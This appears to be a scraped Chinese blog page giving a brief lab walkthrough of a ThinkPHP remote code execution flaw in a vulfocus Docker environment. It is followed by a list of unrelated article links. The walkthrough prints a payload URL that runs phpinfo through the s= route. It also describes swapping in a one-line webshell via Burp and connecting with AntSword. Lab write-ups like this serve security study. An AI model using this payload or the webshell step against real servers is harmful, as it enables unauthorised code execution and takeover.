当前位置: 首页 > news >正文

thinkphp框架远程代码执行

news 2025/8/2 20:09:34

一、环境

vulfocus网上自行下载

启动命令:

 docker run -d --privileged -p 8081:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=192.168.131.144  8e55f85571c8

一定添加--privileged不然只能拉取环境首页不显示

二、thinkphp远程代码执行

首页:

先开始资产收集:

端口:

目录:

网上搜索历史cve

输入pyload

http://192.168.131.144:29319/index.php?s=/index/index/name/${@phpinfo()})

命令执行

使用bp抓包

替换成一句话木马

使用蚁剑去连接

http://www.lryc.cn/news/409980.html

相关文章:

  • 【公式】博弈论中的核心算法:纳什均衡公式解析
  • 计算机网络面试题2
  • Linux网络——深入理解传入层协议TCP
  • 快速搞定分布式RabbitMQ---RabbitMQ进阶与实战
  • 5万字长文吃透快手大数据面试题及参考答案(持续更新)
  • WordPress原创插件:启用关闭经典编辑器和小工具
  • 萝卜快跑:自动驾驶的先锋与挑战
  • 得到xml所有label 名字和数量 get_xml_lab.py,get_json_lab.py
  • 数据结构算法-排序(二)
  • Linux安装与配置
  • AI赋能交通治理:非机动车监测识别技术在城市街道安全管理中的应用
  • 水电站泄洪放水预警广播系统解决方案
  • 【Django】ajax和django接口交互(获取新密码)
  • Logback 日志打印导致程序崩溃的实战分析
  • 新加坡 Numen Cyber 与香港光环云数据有限公司达成战略合作
  • Laravel魔术方法:框架的隐秘力量
  • 系统复习Java日志体系
  • 网络管理linux命令
  • PowerDNS架构解析与安装部署指南
  • Ubuntu 20.04.6 安装 Elasticsearch
  • Python for循环迭代原理(迭代器 Iterator)
  • 通信原理-思科实验四:静态路由项配置实验
  • ngzero使用外部的svg图标
  • 逆矩阵、秩
  • pc端小程序抓包修改数据相关记录
  • 用Python打造精彩动画与视频.2.1 Python基础语法概述
  • Golang高效合并(拼接)多个gzip压缩文件
  • MySQL数据库-基本概念
  • 【无标题】web+http协议+nginx搭建+nginx反向代理(环境准备)
  • c-periphery RS485串口库文档serial.md(serial.h)(非阻塞读)(VMIN、VTIME)